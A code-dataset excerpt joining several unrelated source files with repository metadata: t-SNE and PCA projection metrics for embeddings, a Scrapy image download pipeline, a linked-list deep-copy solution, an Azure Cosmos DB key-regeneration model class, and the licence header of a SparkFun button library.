tx = (tx - np.min(tx)) / (np.max(tx) - np.min(tx))
ty = (ty - np.min(ty)) / (np.max(ty) - np.min(ty))
tsne_results[:, 0], tsne_results[:, 1] = tx, ty
width = 4000
height = 4000
max_dim = 100
full_image = Image.new('RGBA', (width, height))
for img, x, y in zip(images, tx, ty):
tile = img
rs = max(1, tile.shape[0] / max_dim, tile.shape[1] / max_dim)
tile = sk_transform.resize(tile, (int(tile.shape[0] / rs), int(tile.shape[1] / rs)), anti_aliasing=True)
tile = Image.fromarray(np.uint8(tile * 255))
full_image.paste(tile, (int((width - max_dim) * x), int((height - max_dim) * y)), mask=tile.convert('RGBA'))
image_plot_file = '/tmp/tsne-image-plot.png'
full_image.save(image_plot_file)
return image_plot_file
class EmbeddingTSNEProjection(ProjectionMetric):
name = 'embedding-tsne'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=5000,
random_state=14)
tsne_results = tsne.fit_transform(sel_x)
return np.concatenate((tsne_results, labels),
axis=1)
class EmbeddingPCAProjection(ProjectionMetric):
name = 'embedding-pca'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(sel_x)
pca_result = pca.transform(sel_x)
return np.concatenate((pca_result, labels),
axis=1)
class EmbeddingsFromAppearenceNetTSNEProjection(ProjectionMetric):
name = 'common-embedding-tsne'
input_type = 'common_embedding_from_appearence_net_on_validation'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
obj_emb, sketch_emb, y, skt_y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, np.expand_dims(labels, -1)),
axis=1),
np.concatenate((skt_tsne, np.expand_dims(skt_labels, -1)),
axis=1)])
class EmbeddingsFromTripletTSNEProjection(ProjectionMetric):
name = 'common-obj-rep-tsne'
input_type = 'rep_SBIR_on_validation_set'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
_, _, _, _, _, R_ave, mAP, obj_emb, sketch_emb, y = input_data
skt_y = y
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, labels),
axis=1),
np.concatenate((skt_tsne, skt_labels),
axis=1)])
class ClusterTSNEProjection(ProjectionMetric):
name = 'tsne-cluster'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(x))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
x, y, pred_z = x[idx], y[idx], pred_z[idx]
for sketch, label, feature in zip(x, y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
kmeans = KMeans(n_clusters=30, random_state=14).fit(feats)
cluster_labels = kmeans.labels_
sel_feats, feats_labels = None, None
for i in range(30):
clustered_feats = np.array(tsne_results)[np.where(cluster_labels == i)[0]]
sel_feats = np.concatenate((sel_feats, clustered_feats)) if sel_feats is not None else clustered_feats
feat_label = np.ones(len(clustered_feats,)) * i
feats_labels = np.concatenate((feats_labels, feat_label)) if feats_labels is not None else feat_label
np.random.seed()
return np.concatenate((sel_feats, np.expand_dims(feats_labels, axis=1)),
axis=1)
class PredictedLabelsTSNEProjection(ProjectionMetric):
name = 'tsne-predicted'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z, pred_y = y[idx], pred_z[idx], pred_y[idx]
for label, feature, pred_label in zip(y, pred_z, pred_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(pred_label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, np.expand_dims(labels, axis=1)),
axis=1)
class PCAProjection(ProjectionMetric):
name = 'pca'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
entries, _, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(entries))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
for i in idx:
skt = entries[i]
if skt['label'] not in sel_labels and label_counter < 10:
sel_labels.append(skt['label'])
label_counter += 1
if skt['label'] in sel_labels:
feats.append(skt['features'])
labels.append(skt['label'])
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(feats)
pca_result = pca.transform(feats)
return np.concatenate((pca_result, np.expand_dims(labels, axis=1)),
axis=1)
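# A rough plotting sketch for the (N, 3) arrays these projection metrics return
# (x, y, label per row). The matplotlib usage is an assumption; the framework's
# own plotting lives elsewhere in core.metrics:
#
#     import matplotlib.pyplot as plt
#     points = TSNEProjection().compute(input_data)
#     plt.scatter(points[:, 0], points[:, 1], c=points[:, 2], cmap="tab10", s=5)
#     plt.savefig("/tmp/tsne-scatter.png")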
| 36.585165
| 174
| 0.560787
|
import os
import numpy as np
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA
import skimage.transform as sk_transform
from sklearn.cluster import KMeans
from PIL import Image
from core.metrics import ProjectionMetric, ImageMetric
class TSNEProjection(ProjectionMetric):
name = 'tsne'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z = y[idx], pred_z[idx]
for label, feature in zip(y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, labels),
axis=1)
class TSNEImagesProjection(ImageMetric):
name = 'tsne-images'
input_type = 'features_and_images'
def compute(self, input_data):
feats, images = input_data
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
tx, ty = tsne_results[:, 0], tsne_results[:, 1]
tx = (tx - np.min(tx)) / (np.max(tx) - np.min(tx))
ty = (ty - np.min(ty)) / (np.max(ty) - np.min(ty))
tsne_results[:, 0], tsne_results[:, 1] = tx, ty
width = 4000
height = 4000
max_dim = 100
full_image = Image.new('RGBA', (width, height))
for img, x, y in zip(images, tx, ty):
tile = img
rs = max(1, tile.shape[0] / max_dim, tile.shape[1] / max_dim)
tile = sk_transform.resize(tile, (int(tile.shape[0] / rs), int(tile.shape[1] / rs)), anti_aliasing=True)
tile = Image.fromarray(np.uint8(tile * 255))
full_image.paste(tile, (int((width - max_dim) * x), int((height - max_dim) * y)), mask=tile.convert('RGBA'))
image_plot_file = '/tmp/tsne-image-plot.png'
full_image.save(image_plot_file)
return image_plot_file
class EmbeddingTSNEProjection(ProjectionMetric):
name = 'embedding-tsne'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=5000,
random_state=14)
tsne_results = tsne.fit_transform(sel_x)
return np.concatenate((tsne_results, labels),
axis=1)
class EmbeddingPCAProjection(ProjectionMetric):
name = 'embedding-pca'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(sel_x)
pca_result = pca.transform(sel_x)
return np.concatenate((pca_result, labels),
axis=1)
class EmbeddingsFromAppearenceNetTSNEProjection(ProjectionMetric):
name = 'common-embedding-tsne'
input_type = 'common_embedding_from_appearence_net_on_validation'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
obj_emb, sketch_emb, y, skt_y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, np.expand_dims(labels, -1)),
axis=1),
np.concatenate((skt_tsne, np.expand_dims(skt_labels, -1)),
axis=1)])
class EmbeddingsFromTripletTSNEProjection(ProjectionMetric):
name = 'common-obj-rep-tsne'
input_type = 'rep_SBIR_on_validation_set'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
_, _, _, _, _, R_ave, mAP, obj_emb, sketch_emb, y = input_data
skt_y = y
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, labels),
axis=1),
np.concatenate((skt_tsne, skt_labels),
axis=1)])
class ClusterTSNEProjection(ProjectionMetric):
name = 'tsne-cluster'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(x))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
x, y, pred_z = x[idx], y[idx], pred_z[idx]
for sketch, label, feature in zip(x, y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
kmeans = KMeans(n_clusters=30, random_state=14).fit(feats)
cluster_labels = kmeans.labels_
sel_feats, feats_labels = None, None
for i in range(30):
clustered_feats = np.array(tsne_results)[np.where(cluster_labels == i)[0]]
sel_feats = np.concatenate((sel_feats, clustered_feats)) if sel_feats is not None else clustered_feats
feat_label = np.ones(len(clustered_feats,)) * i
feats_labels = np.concatenate((feats_labels, feat_label)) if feats_labels is not None else feat_label
np.random.seed()
return np.concatenate((sel_feats, np.expand_dims(feats_labels, axis=1)),
axis=1)
class PredictedLabelsTSNEProjection(ProjectionMetric):
name = 'tsne-predicted'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z, pred_y = y[idx], pred_z[idx], pred_y[idx]
for label, feature, pred_label in zip(y, pred_z, pred_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(pred_label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, np.expand_dims(labels, axis=1)),
axis=1)
class PCAProjection(ProjectionMetric):
name = 'pca'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
entries, _, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(entries))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
for i in idx:
skt = entries[i]
if skt['label'] not in sel_labels and label_counter < 10:
sel_labels.append(skt['label'])
label_counter += 1
if skt['label'] in sel_labels:
feats.append(skt['features'])
labels.append(skt['label'])
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(feats)
pca_result = pca.transform(feats)
return np.concatenate((pca_result, np.expand_dims(labels, axis=1)),
axis=1)
| true
| true
|
1c4218ccb0778ac35e790ae6907fa890294ef128
| 2,321
|
py
|
Python
|
codes/apks/pipelines/image_download_pipeline.py
|
RiskySignal/APKCrawler
|
28e1cbccdd378bcb66d020349877f1d87679f8bd
|
[
"MIT"
] | 11
|
2020-11-26T08:15:56.000Z
|
2022-03-30T11:15:39.000Z
|
codes/apks/pipelines/image_download_pipeline.py
|
RiskySignal/APKCrawler
|
28e1cbccdd378bcb66d020349877f1d87679f8bd
|
[
"MIT"
] | 1
|
2021-01-15T02:04:12.000Z
|
2021-01-15T02:41:01.000Z
|
codes/apks/pipelines/image_download_pipeline.py
|
RiskySignal/APKCrawler
|
28e1cbccdd378bcb66d020349877f1d87679f8bd
|
[
"MIT"
] | 2
|
2021-07-21T19:17:56.000Z
|
2022-02-14T07:36:11.000Z
|
# coding=utf-8
import logging
from scrapy.pipelines.images import ImagesPipeline
from items import AppDetail
from scrapy.utils.python import to_bytes
import hashlib
import scrapy
import os
from pipelines.folder_path import get_app_folder
import settings as project_settings
from database import Database
class ImageDownloadPipeline(ImagesPipeline):
logger = logging.getLogger("ImageDownloadPipeline")
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
self.db = Database()
def get_media_requests(self, item: AppDetail, info):
app_folder = get_app_folder(item)
file_path = os.path.relpath(app_folder, project_settings.FILES_STORE)
image_length = len(item['picture_links'])
pruned_picture_links = []
pruned_picture_link_ids = []
for _image_index_ in range(image_length):
picture_link = item['picture_links'][_image_index_]
picture_link_id = item['picture_link_ids'][_image_index_]
if not self.db.get_image_status(picture_link_id):
pruned_picture_links.append(picture_link)
pruned_picture_link_ids.append(picture_link_id)
else:
logging.info("Image file {} exists.".format(picture_link))
item['picture_links'] = pruned_picture_links
item['picture_link_ids'] = pruned_picture_link_ids
for picture_link in item['picture_links']:
yield scrapy.Request(picture_link, meta={'file_path': file_path})
def file_path(self, request, response=None, info=None, *, item=None):
image_guid = hashlib.sha1(to_bytes(request.url)).hexdigest()
return os.path.join(request.meta['file_path'], "%s.jpg" % image_guid)
def item_completed(self, results, item: AppDetail, info):
for result_index in range(len(results)):
result = results[result_index]
if result[0]:
self.logger.info("Download image '{}' successfully.".format(item['picture_links'][result_index]))
self.db.set_image_available(item['picture_link_ids'][result_index])
else:
self.logger.error("Fail to download image '{}'.".format(item['picture_links'][result_index]))
return item
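# To enable this pipeline, the Scrapy project settings would need roughly the
# following (the dotted path and store directory are assumptions based on this
# project's layout; ITEM_PIPELINES and IMAGES_STORE themselves are standard Scrapy
# settings, and ImagesPipeline will not run without IMAGES_STORE):
#
#     # settings.py
#     ITEM_PIPELINES = {
#         "pipelines.image_download_pipeline.ImageDownloadPipeline": 300,
#     }
#     FILES_STORE = "/data/apk_crawler"
#     IMAGES_STORE = "/data/apk_crawler"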
| 41.446429
| 113
| 0.687635
|
import logging
from scrapy.pipelines.images import ImagesPipeline
from items import AppDetail
from scrapy.utils.python import to_bytes
import hashlib
import scrapy
import os
from pipelines.folder_path import get_app_folder
import settings as project_settings
from database import Database
class ImageDownloadPipeline(ImagesPipeline):
logger = logging.getLogger("ImageDownloadPipeline")
def __init__(self, store_uri, download_func=None, settings=None):
super().__init__(store_uri, download_func, settings)
self.db = Database()
def get_media_requests(self, item: AppDetail, info):
app_folder = get_app_folder(item)
file_path = os.path.relpath(app_folder, project_settings.FILES_STORE)
image_length = len(item['picture_links'])
pruned_picture_links = []
pruned_picture_link_ids = []
for _image_index_ in range(image_length):
picture_link = item['picture_links'][_image_index_]
picture_link_id = item['picture_link_ids'][_image_index_]
if not self.db.get_image_status(picture_link_id):
pruned_picture_links.append(picture_link)
pruned_picture_link_ids.append(picture_link_id)
else:
logging.info("Image file {} exists.".format(picture_link))
item['picture_links'] = pruned_picture_links
item['picture_link_ids'] = pruned_picture_link_ids
for picture_link in item['picture_links']:
yield scrapy.Request(picture_link, meta={'file_path': file_path})
def file_path(self, request, response=None, info=None, *, item=None):
image_guid = hashlib.sha1(to_bytes(request.url)).hexdigest()
return os.path.join(request.meta['file_path'], "%s.jpg" % image_guid)
def item_completed(self, results, item: AppDetail, info):
for result_index in range(len(results)):
result = results[result_index]
if result[0]:
self.logger.info("Download image '{}' successfully.".format(item['picture_links'][result_index]))
self.db.set_image_available(item['picture_link_ids'][result_index])
else:
self.logger.error("Fail to download image '{}'.".format(item['picture_links'][result_index]))
return item
| true
| true
|
1c4218f8f1a6553933731f5deb42365604dfe0b2
| 2,123
|
py
|
Python
|
src/interviewbit/hash/copy_list.py
|
JadielTeofilo/General-Algorithms
|
dfcf86c6ecd727573079f8971187c47bdb7a37bb
|
[
"MIT"
] | null | null | null |
src/interviewbit/hash/copy_list.py
|
JadielTeofilo/General-Algorithms
|
dfcf86c6ecd727573079f8971187c47bdb7a37bb
|
[
"MIT"
] | null | null | null |
src/interviewbit/hash/copy_list.py
|
JadielTeofilo/General-Algorithms
|
dfcf86c6ecd727573079f8971187c47bdb7a37bb
|
[
"MIT"
] | null | null | null |
"""
A linked list is given such that each node contains an additional random pointer which could point to any node in the list or NULL.
Return a deep copy of the list.
Example
Given the list
    1 -> 2 -> 3
with random pointers going from
    1 -> 3
    2 -> 1
    3 -> 1
you should return a deep copy of the list. The returned answer should not contain
the same nodes as the original list, but copies of them. The pointers in the
returned list should not link to any node in the original input list.
Approach: DFS along the next pointers, skipping nodes that were already visited.
Each node is copied once and stored in a visited map keyed by label; the recursion
stops when no unvisited successor remains. Random pointers are wired up in a
second pass using the visited map.
O(n) time complexity
O(n) space complexity because of the recursion stack and the visited map
"""
from typing import List, Dict, Set, Optional
# Definition for singly-linked list with a random pointer.
class RandomListNode:
def __init__(self, x):
self.label = x
self.next = None
self.random = None
class Solution:
# @param head, a RandomListNode
# @return a RandomListNode
def copyRandomList(self, head: RandomListNode) -> Optional[RandomListNode]:
visited: Dict[int, RandomListNode] = dict()
root = self.copy_list(head, visited)
while head:
if head.random:
visited[head.label].random = visited[head.random.label]
head = head.next
return root
def copy_list(self, head: RandomListNode,
visited: Dict[int, RandomListNode]) -> Optional[RandomListNode]:
if not head:
return
if head.label in visited:
return visited[head.label]
curr: RandomListNode = RandomListNode(head.label)
visited[head.label] = curr
next_copy, random_copy = None, None
if head.next:
next_copy = self.copy_list(head.next,
visited)
curr.next = next_copy
return curr
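# A minimal self-check sketch for the copier above: build 1 -> 2 -> 3 with random
# pointers 1->3, 2->1, 3->1 and verify the copy reproduces labels without sharing nodes.
if __name__ == "__main__":
    n1, n2, n3 = RandomListNode(1), RandomListNode(2), RandomListNode(3)
    n1.next, n2.next = n2, n3
    n1.random, n2.random, n3.random = n3, n1, n1
    copy = Solution().copyRandomList(n1)
    assert copy is not n1 and copy.label == 1
    assert copy.next.label == 2 and copy.next.next.label == 3
    assert copy.random.label == 3 and copy.next.random.label == 1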
| 26.5375
| 227
| 0.607631
|
from typing import List, Dict, Set, Optional
class RandomListNode:
def __init__(self, x):
self.label = x
self.next = None
self.random = None
class Solution:
def copyRandomList(self, head: RandomListNode) -> Optional[RandomListNode]:
visited: Dict[int, RandomListNode] = dict()
root = self.copy_list(head, visited)
while head:
if head.random:
visited[head.label].random = visited[head.random.label]
head = head.next
return root
def copy_list(self, head: RandomListNode,
visited: Dict[int, RandomListNode]) -> Optional[RandomListNode]:
if not head:
return
if head.label in visited:
return visited[head.label]
curr: RandomListNode = RandomListNode(head.label)
visited[head.label] = curr
next_copy, random_copy = None, None
if head.next:
next_copy = self.copy_list(head.next,
visited)
curr.next = next_copy
return curr
| true
| true
|
1c4219c10b3a2ceaaedd396a815c22e2d089d4d4
| 1,097
|
py
|
Python
|
azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/models/database_account_regenerate_key_parameters.py
|
SUSE/azure-sdk-for-python
|
324f99d26dd6f4ee9793b9bf1d4d5f928e4b6c2f
|
[
"MIT"
] | 2
|
2020-07-29T14:22:17.000Z
|
2020-11-06T18:47:40.000Z
|
azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/models/database_account_regenerate_key_parameters.py
|
SUSE/azure-sdk-for-python
|
324f99d26dd6f4ee9793b9bf1d4d5f928e4b6c2f
|
[
"MIT"
] | 1
|
2016-08-01T07:37:04.000Z
|
2016-08-01T07:37:04.000Z
|
azure-mgmt-cosmosdb/azure/mgmt/cosmosdb/models/database_account_regenerate_key_parameters.py
|
SUSE/azure-sdk-for-python
|
324f99d26dd6f4ee9793b9bf1d4d5f928e4b6c2f
|
[
"MIT"
] | 1
|
2020-12-12T21:04:41.000Z
|
2020-12-12T21:04:41.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DatabaseAccountRegenerateKeyParameters(Model):
"""Parameters to regenerate the keys within the database account.
:param key_kind: The access key to regenerate. Possible values include:
'primary', 'secondary', 'primaryReadonly', 'secondaryReadonly'
:type key_kind: str or :class:`KeyKind
<azure.mgmt.cosmosdb.models.KeyKind>`
"""
_validation = {
'key_kind': {'required': True},
}
_attribute_map = {
'key_kind': {'key': 'keyKind', 'type': 'str'},
}
def __init__(self, key_kind):
self.key_kind = key_kind
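# A minimal usage sketch; the management-client call is an assumption about the
# azure-mgmt-cosmosdb operations class and is therefore left commented out:
if __name__ == "__main__":
    params = DatabaseAccountRegenerateKeyParameters(key_kind="primary")
    print(params.key_kind)
    # client.database_accounts.regenerate_key(resource_group_name, account_name, params)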
| 32.264706
| 76
| 0.600729
|
from msrest.serialization import Model
class DatabaseAccountRegenerateKeyParameters(Model):
_validation = {
'key_kind': {'required': True},
}
_attribute_map = {
'key_kind': {'key': 'keyKind', 'type': 'str'},
}
def __init__(self, key_kind):
self.key_kind = key_kind
| true
| true
|
1c4219fff67ffabcc60003d010889745dc2acda1
| 28,399
|
py
|
Python
|
qwiic_button.py
|
sparkfun/Qwiic_Button_Py
|
c7d4a195e7d379c38ee23f445a514a06c92ef8d4
|
[
"MIT"
] | null | null | null |
qwiic_button.py
|
sparkfun/Qwiic_Button_Py
|
c7d4a195e7d379c38ee23f445a514a06c92ef8d4
|
[
"MIT"
] | 2
|
2021-02-14T02:05:05.000Z
|
2021-03-11T16:49:08.000Z
|
qwiic_button.py
|
sparkfun/Qwiic_Button_Py
|
c7d4a195e7d379c38ee23f445a514a06c92ef8d4
|
[
"MIT"
] | null | null | null |
#-----------------------------------------------------------------------------
# qwiic_button.py
#
# Python library for the SparkFun qwiic button.
# https://www.sparkfun.com/products/15932
#
#------------------------------------------------------------------------
#
# Written by Priyanka Makin @ SparkFun Electronics, January 2021
#
# This python library supports the SparkFun Electronics qwiic
# sensor/board ecosystem
#
# More information on qwiic is at https:// www.sparkfun.com/qwiic
#
# Do you like this library? Help support SparkFun. Buy a board!
#==================================================================================
# Copyright (c) 2020 SparkFun Electronics
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
